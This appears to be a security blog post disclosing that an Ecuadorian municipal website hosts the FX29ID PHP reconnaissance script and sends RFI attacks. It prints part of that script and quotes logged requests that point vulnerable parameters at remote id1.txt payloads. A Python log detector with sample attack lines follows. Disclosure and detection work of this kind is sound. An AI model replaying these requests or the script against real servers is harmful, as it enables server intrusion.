Colombia, Venezuela and now Ecuador. How far are we from reporting the whole of South America? 🙂
The web site of the ‘Municipio del Cantón Mejía’ in Ecuador has been hosting malware and also attacking our honeypots for a while. As always, we reported it and didn’t hear anything back.
They are hosting the common FX29ID PHP exploit:
http://www.municipiodemejia.gov.ec/administrator/components/com_search/sken/id1(feelcomz).txt
<?php
##[ Fxxxx ]##
fx("ID","FeeL"."CoMz");
$P = @getcwd();
$IP = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
The same server is also attempting RFI attacks against our systems (190.152.217.250 is their IP address):
SCAN:190.152.217.250 /xxx/new-visitor.inc.php?lvc_include_dir=http://www.j8design.com/id1.txt?
190.152.217.250 /xxx/show.php?path= http://kucing1.fileave.com/id1.txt?
190.152.217.250 //?_SERVER[DOCUMENT_ROOT]= http://clompunk.webs.com/id1.txt?
190.152.217.250 //bbs///skin/buzzard_espoon/setup.php?dir= http://www.hyonsvc.co.kr//bbs//icon/id1.txt????????
190.152.217.250 //delete_comment.php?board_skin_path= http://www.hyonsvc.co.kr//bbs//icon/id1.txt
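The scan lines above all share one shape: a request parameter whose value is itself a remote URL. As an added example (not code from this post or from our tooling), here is one way to flag that shape in "client-IP request-URI" log lines; the sample lines, the `.example` hosts and the function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# A parameter whose value is a remote URL. Whitespace after "=" is tolerated
# because the logged lines above contain it. A legitimate redirect parameter
# would match too, so allowlist known ones before alerting on this.
RFI_PARAM = re.compile(r"[?&]([^=&\s]+)=\s*((?:https?|ftp)://[^\s&]+)", re.I)

# Constructed sample input (documentation IPs and reserved .example hosts).
SAMPLE = [
    "203.0.113.10 /app/new-visitor.inc.php?lvc_include_dir=http://payload.example/id1.txt?",
    "203.0.113.10 //?_SERVER[DOCUMENT_ROOT]= http://payload.example/id1.txt?",
    "203.0.113.10 /index.php?page=http%3A%2F%2Fmirror.example%2Fid1.txt%3F",
    "198.51.100.7 /search.php?q=php+include+tutorial",
]

def find_rfi(line):
    """Return (client_ip, param, remote_url, trailing_qmark) or None."""
    parts = line.strip().split(None, 1)
    if len(parts) != 2:
        return None
    ip, request = parts
    # Decode first so percent-encoded URLs are caught as well.
    m = RFI_PARAM.search(unquote(request))
    if not m:
        return None
    param, url = m.group(1), m.group(2)
    # The trailing "?" seen on every scan line is kept as an extra signal.
    return ip, param, url.rstrip("?"), url.endswith("?")

def summarize(lines):
    """Group hits by source IP: {ip: [(param, remote_url, trailing_qmark), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        hit = find_rfi(line)
        if hit:
            hits[hit[0]].append(hit[1:])
    return dict(hits)

if __name__ == "__main__":
    for ip, found in summarize(SAMPLE).items():
        print(ip, len(found), "RFI attempts")
        for param, url, qmark in found:
            print("   ", param, "->", url, "(trailing ?)" if qmark else "")
```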
If you know anyone at the Ecuador .gov, let them know about it. Hopefully they will get it fixed soon.
1 comment
oh this is very much bulish